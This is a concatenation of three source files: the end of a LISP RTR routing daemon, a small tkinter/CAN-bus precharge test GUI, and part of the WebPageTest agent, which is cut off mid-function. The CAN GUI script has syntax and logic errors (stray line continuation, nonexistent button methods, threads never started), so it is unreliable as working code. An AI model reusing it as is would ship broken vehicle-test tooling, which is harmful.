"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp rtr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp database-mapping" : [lisp_rtr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp glean-mapping" : [lisp_rtr_glean_mapping_command, {
"instance-id" : [False],
"eid-prefix" : [True],
"rloc-prefix" : [True],
"rloc-probe" : [True, "yes", "no"] }],
"show rtr-rloc-probing" : [lisp_rtr_show_rloc_probe_command, { }],
"show rtr-keys" : [lisp_rtr_show_keys_command, {}],
"show rtr-map-cache" : [lisp_rtr_show_command, {}],
"show rtr-map-cache-dns" : [lisp_rtr_show_command_dns, {}]
}
#
# lisp_rtr_process_trace_packet
#
# Process RLOC-based LISP-Trace message.
#
def lisp_rtr_process_trace_packet(lisp_socket):
#
# Read from listen socket for port 2434 and parse LISP-Trace packet.
#
opcode, source, port, packet = lisp.lisp_receive(lisp_socket, False)
trace = lisp.lisp_trace()
if (trace.decode(packet) == False): return
#
# Cache the translated information. Will use local addressing info to
# find translated information in lisp_trace_append().
#
trace.rtr_cache_nat_trace(source, port)
#enddef
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_rtr_startup() == False):
lisp.lprint("lisp_rtr_startup() failed")
lisp.lisp_print_banner("RTR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ipc_punt_socket, lisp_trace_listen_socket]
ephem_sockets = [lisp_ephem_listen_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# LISP-TRACE messages coming from an ltr client program.
#
if (lisp_trace_listen_socket in ready_list):
lisp_rtr_process_trace_packet(lisp_trace_listen_socket)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket..
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-rtr", [lisp_rtr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-rtr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_rtr_data_plane(packet, "")
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe request, using pcap")
continue
#endif
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("RTR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_rtr_shutdown()
lisp.lisp_print_banner("RTR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
test_precharge_interface.py
|
import tkinter as tk
import can
import time
import threading
# https://realpython.com/python-gui-tkinter/
# CANBUS SPEED
CANBUS_SPEED = 500000
# CANBUS ADDRESSES
THROTTLE_CONTROLLER_PERIPERAL_ID = 0x343
ORION_BMS_STATUS_ID = 0x180
# INERFACE OBJECTS
window = tk.Tk()
greeting = tk.Label(text="TS_21 ELECTRICAL TEST INTERFACE")
precharge_button = tk.Button(
text="PRECHARGE",
bg = "red",
fg = "white"
)
drive_button = tk.Button(
text="DRIVE",
bg = "green",
fg = "white"
)
def send_handler(bus, msg):
try:
bus.send(msg,timeout=None)
print(msg.data)
print("Message sent on {}\r".format(bus.channel_info))
except:
print("Message not sent")
def throttle_interface(bus, msg):
# DEFAULT PERIPERAL PAYLOAD
payload = [0,0,0,0,0,0,0,0]
if (precharge_button.get()):
payload[0] = 1;
if (drive_button.get()):
payload[1] = 1;
msg = can.Message(arbitration_id=THROTTLE_CONTROLLER_PERIPERAL_ID, data=payload)
time.sleep(1)
def orion_interface(bus):
payload = [7,0,0,0,0,0,0,0]
msg = can.Message(arbitration_id=ORION_BMS_STATUS_ID, data=payload)
send_handler(bus, msg)
time.sleep(0.2)
def setup_canbus():
# may need to add serial=12093 <- or whatever number that is.
bus = can.interface.Bus(bustype='kvaser', channel=0, bitrate=CANBUS_SPEED)\
print(bus.get_stats())
bus.flash(flash=True)
return bus
def manage_window():
greeting.pack()
precharge_button.pack()
drive_button.pack()
window.mainloop()
try:
threading.Thread(target=setup_canbus)
threading.Thread(target=manage_window)
except:
print("Error! Cannot start new thread")
while 1:
pass
|
webpagetest.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Main entry point for interfacing with WebPageTest server"""
from datetime import datetime
import gzip
import logging
import multiprocessing
import os
import platform
import re
import shutil
import socket
import subprocess
import threading
import time
import urllib
import zipfile
import psutil
import monotonic
import ujson as json
DEFAULT_JPEG_QUALITY = 30
class WebPageTest(object):
"""Controller for interfacing with the WebPageTest server"""
# pylint: disable=E0611
def __init__(self, options, workdir):
import requests
self.fetch_queue = multiprocessing.JoinableQueue()
self.fetch_result_queue = multiprocessing.JoinableQueue()
self.job = None
self.first_failure = None
self.session = requests.Session()
self.options = options
self.fps = options.fps
self.test_run_count = 0
self.log_formatter = logging.Formatter(fmt="%(asctime)s.%(msecs)03d - %(message)s",
datefmt="%H:%M:%S")
self.log_handler = None
# Configurable options
self.url = options.server
self.location = ''
self.test_locations = []
if options.location is not None:
self.test_locations = options.location.split(',')
self.location = str(self.test_locations[0])
self.key = options.key
self.time_limit = 120
self.cpu_scale_multiplier = None
# get the hostname or build one automatically if we are on a vmware system
# (specific MAC address range)
hostname = platform.uname()[1]
interfaces = psutil.net_if_addrs()
if interfaces is not None:
logging.debug('Interfaces:')
logging.debug(interfaces)
for interface in interfaces:
iface = interfaces[interface]
for addr in iface:
match = re.search(r'^00[\-:]50[\-:]56[\-:]00[\-:]'
r'([\da-fA-F]+)[\-:]([\da-fA-F]+)$', addr.address)
if match:
server = match.group(1)
machine = match.group(2)
hostname = 'VM{0}-{1}'.format(server, machine)
self.pc_name = hostname if options.name is None else options.name
self.auth_name = options.username
self.auth_password = options.password if options.password is not None else ''
self.validate_server_certificate = options.validcertificate
self.instance_id = None
self.zone = None
# Get the screen resolution if we're in desktop mode
self.screen_width = None
self.screen_height = None
if not self.options.android and not self.options.iOS:
if self.options.xvfb:
self.screen_width = 1920
self.screen_height = 1200
elif platform.system() == 'Windows':
try:
from win32api import GetSystemMetrics
self.screen_width = GetSystemMetrics(0)
self.screen_height = GetSystemMetrics(1)
except Exception:
pass
elif platform.system() == 'Darwin':
try:
from AppKit import NSScreen
self.screen_width = int(NSScreen.screens()[0].frame().size.width)
self.screen_height = int(NSScreen.screens()[0].frame().size.height)
except Exception:
pass
# See if we have to load dynamic config options
if self.options.ec2:
self.load_from_ec2()
elif self.options.gce:
self.load_from_gce()
# Set the session authentication options
if self.auth_name is not None:
self.session.auth = (self.auth_name, self.auth_password)
self.session.verify = self.validate_server_certificate
if options.cert is not None:
if options.certkey is not None:
self.session.cert = (options.cert, options.certkey)
else:
self.session.cert = options.cert
# Set up the temporary directories
self.workdir = os.path.join(workdir, self.pc_name)
self.persistent_dir = self.workdir + '.data'
self.profile_dir = os.path.join(self.workdir, 'browser')
if os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
# If we are running in a git clone, grab the date of the last
# commit as the version
self.version = '19.04'
try:
directory = os.path.abspath(os.path.dirname(__file__))
out = subprocess.check_output('git log -1 --format=%cd --date=raw',
shell=True, cwd=directory)
if out is not None:
matches = re.search(r'^(\d+)', out)
if matches:
timestamp = int(matches.group(1))
git_date = datetime.utcfromtimestamp(timestamp)
self.version = git_date.strftime('%y%m%d.%H%m%S')
except Exception:
pass
# Load the discovered browser margins
self.margins = {}
margins_file = os.path.join(self.persistent_dir, 'margins.json')
if os.path.isfile(margins_file):
with open(margins_file, 'rb') as f_in:
self.margins = json.load(f_in)
# Override the public webpagetest server automatically
if self.url is not None and self.url.find('www.webpagetest.org') >= 0:
self.url = 'http://agent.webpagetest.org/work/'
# pylint: enable=E0611
def benchmark_cpu(self):
"""Benchmark the CPU for mobile emulation"""
self.cpu_scale_multiplier = 1.0
if not self.options.android and not self.options.iOS:
import hashlib
logging.debug('Starting CPU benchmark')
hash_val = hashlib.sha256()
with open(__file__, 'rb') as f_in:
hash_data = f_in.read(4096)
start = monotonic.monotonic()
# 106k iterations takes ~1 second on the reference machine
for _ in xrange(106000):
hash_val.update(hash_data)
elapsed = monotonic.monotonic() - start
self.cpu_scale_multiplier = 1.0 / elapsed
logging.debug('CPU Benchmark elapsed time: %0.3f, multiplier: %0.3f',
elapsed, self.cpu_scale_multiplier)
def get_persistent_dir(self):
"""Return the path to the persistent cache directory"""
return self.persistent_dir
def load_from_ec2(self):
"""Load config settings from EC2 user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
# The Windows AMI's use static routes which are not copied across regions.
# This sets them up before we attempt to access the metadata
if platform.system() == "Windows":
from .os_util import run_elevated
directory = os.path.abspath(os.path.dirname(__file__))
ec2_script = os.path.join(directory, 'support', 'ec2', 'win_routes.ps1')
run_elevated('powershell.exe', ec2_script)
# Make sure the route blocking isn't configured on Linux
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'delete', '169.254.169.254'])
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/user-data',
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/meta-data/instance-id',
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/latest/meta-data/placement/availability-zone',
timeout=30, proxies=proxies)
if len(response.text):
self.zone = response.text.strip()
if not len(self.test_locations):
self.location = self.zone[:-1]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
# Block access to the metadata server
if platform.system() == "Linux":
subprocess.call(['sudo', 'route', 'add', '169.254.169.254', 'gw', '127.0.0.1', 'lo'])
def load_from_gce(self):
"""Load config settings from GCE user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/computeMetadata/v1/instance/attributes/wpt_data',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/computeMetadata/v1/instance/id',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
if not len(self.test_locations):
ok = False
while not ok:
try:
response = session.get('http://metadata.google.internal/computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor': 'Google'},
timeout=30, proxies=proxies)
if len(response.text):
zone = response.text.strip()
position = zone.rfind('/')
if position > -1:
zone = zone[position + 1:]
self.zone = zone
self.location = 'gce-' + self.zone[:-2]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def parse_user_data(self, user_data):
"""Parse the provided user data and extract the config info"""
logging.debug("User Data: %s", user_data)
options = user_data.split()
for option in options:
try:
parts = option.split('=', 1)
if len(parts) == 2:
key = parts[0].strip()
value = parts[1].strip()
logging.debug('Setting config option "%s" to "%s"', key, value)
if key == 'wpt_server':
if re.search(r'^https?://', value):
self.url = value
if value.endswith('/'):
self.url += 'work/'
else:
self.url += '/work/'
else:
self.url = 'http://{0}/work/'.format(value)
if key == 'wpt_url':
self.url = value
elif key == 'wpt_loc' or key == 'wpt_location':
if value is not None:
self.test_locations = value.split(',')
self.location = str(self.test_locations[0])
if key == 'wpt_location':
append = []
for loc in self.test_locations:
append.append('{0}_wptdriver'.format(loc))
if len(append):
self.test_locations.extend(append)
elif key == 'wpt_key':
self.key = value
elif key == 'wpt_timeout':
self.time_limit = int(re.search(r'\d+', str(value)).group())
elif key == 'wpt_username':
self.auth_name = value
elif key == 'wpt_password':
self.auth_password = value
elif key == 'wpt_validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'validcertificate' and value == '1':
self.validate_server_certificate = True
elif key == 'wpt_fps':
self.fps = int(re.search(r'\d+', str(value)).group())
elif key == 'fps':
self.fps = int(re.search(r'\d+', str(value)).group())
except Exception:
pass
# pylint: disable=E1101
def get_uptime_minutes(self):
"""Get the system uptime in seconds"""
boot_time = None
try:
boot_time = psutil.boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.get_boot_time()
except Exception:
pass
if boot_time is None:
try:
boot_time = psutil.BOOT_TIME
except Exception:
pass
uptime = None
if boot_time is not None and boot_time > 0:
uptime = int((time.time() - boot_time) / 60)
if uptime is not None and uptime < 0:
uptime = 0
return uptime
# pylint: enable=E1101
def reboot(self):
if platform.system() == 'Windows':
subprocess.call(['shutdown', '/r', '/f'])
else:
subprocess.call(['sudo', 'reboot'])
def get_test(self):
"""Get a job from the server"""
import requests
proxies = {"http": None, "https": None}
from .os_util import get_free_disk_space
if self.cpu_scale_multiplier is None:
self.benchmark_cpu()
if self.url is None:
return None
job = None
locations = list(self.test_locations) if len(self.test_locations) > 1 else [self.location]
location = str(locations.pop(0))
# Shuffle the list order
if len(self.test_locations) > 1:
self.test_locations.append(str(self.test_locations.pop(0)))
count = 0
retry = True
while count < 3 and retry:
retry = False
count += 1
url = self.url + "getwork.php?f=json&shards=1&reboot=1"
url += "&location=" + urllib.quote_plus(location)
url += "&pc=" + urllib.quote_plus(self.pc_name)
if self.key is not None:
url += "&key=" + urllib.quote_plus(self.key)
if self.instance_id is not None:
url += "&ec2=" + urllib.quote_plus(self.instance_id)
if self.zone is not None:
url += "&ec2zone=" + urllib.quote_plus(self.zone)
if self.options.android:
url += '&apk=1'
url += '&version={0}'.format(self.version)
if self.screen_width is not None:
url += '&screenwidth={0:d}'.format(self.screen_width)
if self.screen_height is not None:
url += '&screenheight={0:d}'.format(self.screen_height)
free_disk = get_free_disk_space()
url += '&freedisk={0:0.3f}'.format(free_disk)
uptime = self.get_uptime_minutes()
if uptime is not None:
url += '&upminutes={0:d}'.format(uptime)
logging.info("Checking for work: %s", url)
try:
response = self.session.get(url, timeout=30, proxies=proxies)
if self.options.alive:
with open(self.options.alive, 'a'):
os.utime(self.options.alive, None)
self.first_failure = None
if len(response.text):
if response.text == 'Reboot':
self.reboot()
return None
job = response.json()
logging.debug("Job: %s", json.dumps(job))
# set some default options
job['agent_version'] = self.version
if 'imageQuality' not in job:
job['imageQuality'] = DEFAULT_JPEG_QUALITY
if 'pngScreenShot' not in job:
job['pngScreenShot'] = 0
if 'fvonly' not in job:
job['fvonly'] = 0
if 'width' not in job:
job['width'] = 1024
if 'height' not in job:
job['height'] = 768
if 'browser_width' in job:
job['width'] = job['browser_width']
if 'browser_height' in job:
job['height'] = job['browser_height']
if 'timeout' not in job:
job['timeout'] = self.time_limit
if 'noscript' not in job:
job['noscript'] = 0
if 'Test ID' not in job or 'browser' not in job or 'runs' not in job:
job = None
if 'type' not in job:
job['type'] = ''
if job['type'] == 'traceroute':
job['fvonly'] = 1
if 'fps' not in job:
job['fps'] = self.fps
if 'warmup' not in job:
job['warmup'] = 0
if job['type'] == 'lighthouse':
job['fvonly'] = 1
job['lighthouse'] = 1
job['keep_lighthouse_trace'] = \
bool('lighthouseTrace' in job and job['lighthouseTrace'])
job['lighthouse_throttle'] = \
bool('lighthouseThrottle' in job and job['lighthouseThrottle'])
job['video'] = bool('Capture Video' in job and job['Capture Video'])
job['keepvideo'] = bool('keepvideo' in job and job['keepvideo'])
job['disable_video'] = bool(not job['video'] and
'disable_video' in job and
job['disable_video'])
job['interface'] = None
job['persistent_dir'] = self.persistent_dir
if 'throttle_cpu' in job:
throttle = float(re.search(r'\d+\.?\d*', str(job['throttle_cpu'])).group())
throttle *= self.cpu_scale_multiplier
job['throttle_cpu_requested'] = job['throttle_cpu']
job['throttle_cpu'] = throttle
if job is None and len(locations) > 0:
location = str(locations.pop(0))
retry = True
except requests.exceptions.RequestException as err:
logging.critical("Get Work Error: %s", err.strerror)
retry = True
now = monotonic.monotonic()
if self.first_failure is None:
self.first_failure = now
# Reboot if we haven't been able to reach the server for 30 minutes
elapsed = now - self.first_failure
if elapsed > 1800:
self.reboot()
time.sleep(0.1)
except Exception:
pass
self.job = job
return job
def get_task(self, job):
"""Create a task object for the next test run or return None if the job is done"""
task = None
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'current_state' not in job or not job['current_state']['done']:
if 'run' in job:
# Sharded test, running one run only
if 'current_state' not in job:
job['current_state'] = {"run": int(re.search(r'\d+', str(job['run'])).group()),
"repeat_view": False,
"done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
return task
elif 'current_state' not in job:
job['current_state'] = {"run": 1, "repeat_view": False, "done": False}
elif not job['current_state']['repeat_view'] and \
('fvonly' not in job or not job['fvonly']):
job['current_state']['repeat_view'] = True
else:
if job['warmup'] > 0:
job['warmup'] -= 1
else:
job['current_state']['run'] += 1
job['current_state']['repeat_view'] = False
if job['current_state']['run'] <= job['runs']:
test_id = job['Test ID']
run = job['current_state']['run']
profile_dir = '{0}.{1}.{2:d}'.format(self.profile_dir, test_id, run)
task = {'id': test_id,
'run': run,
'cached': 1 if job['current_state']['repeat_view'] else 0,
'done': False,
'profile': profile_dir,
'error': None,
'log_data': True,
'activity_time': 2,
'combine_steps': False,
'video_directories': [],
'page_data': {},
'navigated': False,
'page_result': None,
'script_step_count': 1}
# Set up the task configuration options
task['port'] = 9222 + (self.test_run_count % 500)
task['task_prefix'] = "{0:d}".format(run)
if task['cached']:
task['task_prefix'] += "_Cached"
task['prefix'] = task['task_prefix']
short_id = "{0}.{1}.{2}".format(task['id'], run, task['cached'])
task['dir'] = os.path.join(self.workdir, short_id)
task['task_video_prefix'] = 'video_{0:d}'.format(run)
if task['cached']:
task['task_video_prefix'] += "_cached"
task['video_subdirectory'] = task['task_video_prefix']
if os.path.isdir(task['dir']):
shutil.rmtree(task['dir'])
os.makedirs(task['dir'])
if not os.path.isdir(profile_dir):
os.makedirs(profile_dir)
if job['current_state']['run'] == job['runs'] or 'run' in job:
if job['current_state']['repeat_view']:
job['current_state']['done'] = True
task['done'] = True
elif 'fvonly' in job and job['fvonly']:
job['current_state']['done'] = True
task['done'] = True
if 'debug' in job and job['debug']:
task['debug_log'] = os.path.join(task['dir'], task['prefix'] + '_debug.log')
try:
self.log_handler = logging.FileHandler(task['debug_log'])
self.log_handler.setFormatter(self.log_formatter)
logging.getLogger().addHandler(self.log_handler)
except Exception:
pass
if 'keepua' not in job or not job['keepua']:
task['AppendUA'] = 'PTST'
if 'UAModifier' in job:
task['AppendUA'] = job['UAModifier']
task['AppendUA'] += '/{0}'.format(self.version)
if 'AppendUA' in job:
if 'AppendUA' in task:
task['AppendUA'] += ' ' + job['AppendUA']
else:
task['AppendUA'] = job['AppendUA']
if 'AppendUA' in task:
task['AppendUA'] = task['AppendUA'].replace('%TESTID%', test_id)\
.replace('%RUN%', str(run))\
.replace('%CACHED%', str(task['cached']))\
.replace('%VERSION%', self.version)
task['block'] = []
if 'block' in job:
block_list = job['block'].split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
if 'blockDomains' in job:
if 'host_rules' not in task:
task['host_rules'] = []
if 'block_domains' not in task:
task['block_domains'] = []
domains = re.split('[, ]', job['blockDomains'])
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
self.build_script(job, task)
task['width'] = job['width']
task['height'] = job['height']
if 'mobile' in job and job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
task['width'] = \
job['width'] + max(self.margins[job['browser']]['width'], 0)
task['height'] = \
job['height'] + max(self.margins[job['browser']]['height'], 0)
else:
task['width'] = job['width'] + 20
task['height'] = job['height'] + 120
task['time_limit'] = job['timeout']
task['test_time_limit'] = task['time_limit'] * task['script_step_count']
task['stop_at_onload'] = bool('web10' in job and job['web10'])
task['run_start_time'] = monotonic.monotonic()
# Keep the full resolution video frames if the browser window is smaller than 600px
if 'thumbsize' not in job and (task['width'] < 600 or task['height'] < 600):
job['fullSizeVideo'] = 1
self.test_run_count += 1
if task is None and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
return task
def running_another_test(self, task):
"""Increment the port for Chrome and the run count"""
task['port'] = 9222 + (self.test_run_count % 500)
self.test_run_count += 1
def build_script(self, job, task):
"""Build the actual script that will be used for testing"""
task['script'] = []
record_count = 0
# Add script commands for any static options that need them
if 'script' in job:
lines = job['script'].splitlines()
for line in lines:
parts = line.split("\t", 2)
if parts is not None and len(parts):
keep = True
record = False
command = parts[0].lower().strip()
target = parts[1].strip() if len(parts) > 1 else None
value = parts[2].strip() if len(parts) > 2 else None
andwait = command.find('andwait')
if andwait > -1:
command = command[:andwait]
record = True
# go through the known commands
if command == 'navigate':
if target is not None and target[:4] != 'http':
target = 'http://' + target
job['url'] = target
record = True
elif command == 'addheader' or command == 'setheader':
if target is not None and len(target):
separator = target.find(':')
if separator > 0:
name = target[:separator].strip()
header_value = target[separator + 1:].strip()
if 'headers' not in task:
task['headers'] = {}
task['headers'][name] = header_value
elif command == 'overridehost':
if target and value:
if 'overrideHosts' not in task:
task['overrideHosts'] = {}
task['overrideHosts'][target] = value
elif command == 'setcookie' and target is not None and value is not None:
url = target
cookie = value
pos = cookie.find(';')
if pos > 0:
cookie = cookie[:pos]
pos = cookie.find('=')
if pos > 0:
cookie_name = cookie[:pos].strip()
cookie_value = cookie[pos + 1:].strip()
if len(cookie_name) and len(cookie_value) and len(url):
if 'cookies' not in task:
task['cookies'] = []
task['cookies'].append({'url': url,
'name': cookie_name,
'value': cookie_value})
# commands that get pre-processed
elif command == 'setuseragent' and target is not None:
job['uastring'] = target
elif command == 'setbrowsersize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
dpr = float(job['dpr']) if 'dpr' in job else 1.0
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = int(float(width) / dpr)
job['height'] = int(float(height) / dpr)
elif command == 'setviewportsize':
keep = False
if target is not None and value is not None:
width = int(re.search(r'\d+', str(target)).group())
height = int(re.search(r'\d+', str(value)).group())
if width > 0 and height > 0 and width < 10000 and height < 10000:
job['width'] = width
job['height'] = height
# Adjust the viewport for non-mobile tests
if 'mobile' not in job or not job['mobile']:
if 'browser' in job and job['browser'] in self.margins:
job['width'] += \
max(self.margins[job['browser']]['width'], 0)
job['height'] += \
max(self.margins[job['browser']]['height'], 0)
else:
job['adjust_viewport'] = True
elif command == 'setdevicescalefactor' and target is not None:
keep = False
job['dpr'] = target
elif command == 'settimeout':
keep = False
if target is not None:
time_limit = int(re.search(r'\d+', str(target)).group())
if time_limit > 0 and time_limit < 1200:
job['timeout'] = time_limit
elif command == 'blockdomains':
keep = False
if target is not None:
if 'block_domains' not in task:
task['block_domains'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = re.split('[, ]', target)
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains'].append(domain)
task['host_rules'].append('"MAP {0} 127.0.0.1"'.format(domain))
elif command == 'blockdomainsexcept':
keep = False
if target is not None:
if 'block_domains_except' not in task:
task['block_domains_except'] = []
if 'host_rules' not in task:
task['host_rules'] = []
domains = target.split()
for domain in domains:
domain = domain.strip()
if len(domain) and domain.find('"') == -1:
task['block_domains_except'].append(domain)
task['host_rules'].append(
'"MAP * 127.0.0.1, EXCLUDE {0}"'.format(domain))
elif command == 'block':
keep = False
if target is not None:
block_list = target.split()
for block in block_list:
block = block.strip()
if len(block):
task['block'].append(block)
elif command == 'setdns':
keep = False
if target is not None and value is not None and len(target) and len(value):
if target.find('"') == -1 and value.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, value))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', value) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, value])
elif command == 'setdnsname':
# Resolve the IP and treat it like a setdns command
keep = False
if target is not None and value is not None and len(target) and len(value):
addr = None
try:
result = socket.getaddrinfo(value, 80)
if result and len(result) > 0:
for entry in result:
if entry and len(entry) >= 5:
sockaddr = entry[4]
if sockaddr and len(sockaddr) >= 1:
addr = sockaddr[0]
break
except Exception:
pass
if addr is not None and target.find('"') == -1:
if 'dns_override' not in task:
task['dns_override'] = []
if 'host_rules' not in task:
task['host_rules'] = []
task['host_rules'].append('"MAP {0} {1}"'.format(target, addr))
if re.match(r'^\d+\.\d+\.\d+\.\d+$', addr) and \
re.match(r'^[a-zA-Z0-9\-\.]+$', target):
task['dns_override'].append([target, addr])
# Commands that get translated into exec commands
elif command in ['click', 'selectvalue', 'sendclick', 'setinnerhtml',
'setinnertext', 'setvalue', 'submitform']:
if target is not None:
# convert the selector into a querySelector
separator = target.find('=')
if separator == -1:
separator = target.find("'")
if separator >= 0:
attribute = target[:separator]
attr_value = target[separator + 1:]
script = "document.querySelector('[{0}=\"{1}\"]')".format(
attribute, attr_value)
if command in ['click', 'sendclick']:
script += '.click();'
elif command == 'submitform' and attr_value is not None:
script += '.submit();'
record = True
elif command in ['setvalue', 'selectvalue'] and value is not None:
script += '.value="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnertext' and value is not None:
script += '.innerText="{0}";'.format(value.replace('"', '\\"'))
elif command == 'setinnerhtml' and value is not None:
script += '.innerHTML="{0}";'.format(value.replace('"', '\\"'))
command = 'exec'
target = script
value = None
if keep:
if record:
record_count += 1
task['script'].append({'command': command,
'target': target,
'value': value,
'record': record})
elif 'url' in job:
if job['url'][:4] != 'http':
job['url'] = 'http://' + job['url']
record_count += 1
task['script'].append({'command': 'navigate', 'target': job['url'], 'record': True})
# Remove any spurious commands from the end of the script
pos = len(task['script']) - 1
while pos > 0:
if task['script'][pos]['record']:
break
task['script'].pop(pos)
pos -= 1
task['script_step_count'] = max(record_count, 1)
logging.debug(task['script'])
def update_browser_viewport(self, task):
"""Update the browser border size based on the measured viewport"""
if 'actual_viewport' in task and 'width' in task and 'height' in task and \
self.job is not None and 'browser' in self.job:
browser = self.job['browser']
width = max(task['width'] - task['actual_viewport']['width'], 0)
height = max(task['height'] - task['actual_viewport']['height'], 0)
if browser not in self.margins or self.margins[browser]['width'] != width or \
self.margins[browser]['height'] != height:
self.margins[browser] = {"width": width, "height": height}
if not os.path.isdir(self.persistent_dir):
os.makedirs(self.persistent_dir)
margins_file = os.path.join(self.persistent_dir, 'margins.json')
with open(margins_file, 'wb') as f_out:
json.dump(self.margins, f_out)
def body_fetch_thread(self):
"""background thread to fetch bodies"""
import requests
session = requests.session()
proxies = {"http": None, "https": None}
try:
while True:
task = self.fetch_queue.get_nowait()
try:
url = task['url']
dest = task['file']
headers = {}
if isinstance(task['headers'], list):
for header in task['headers']:
separator = header.find(':', 2)
if separator >= 0:
header_name = header[:separator].strip()
value = header[separator + 1:].strip()
if header_name.lower() not in ["accept-encoding"] and \
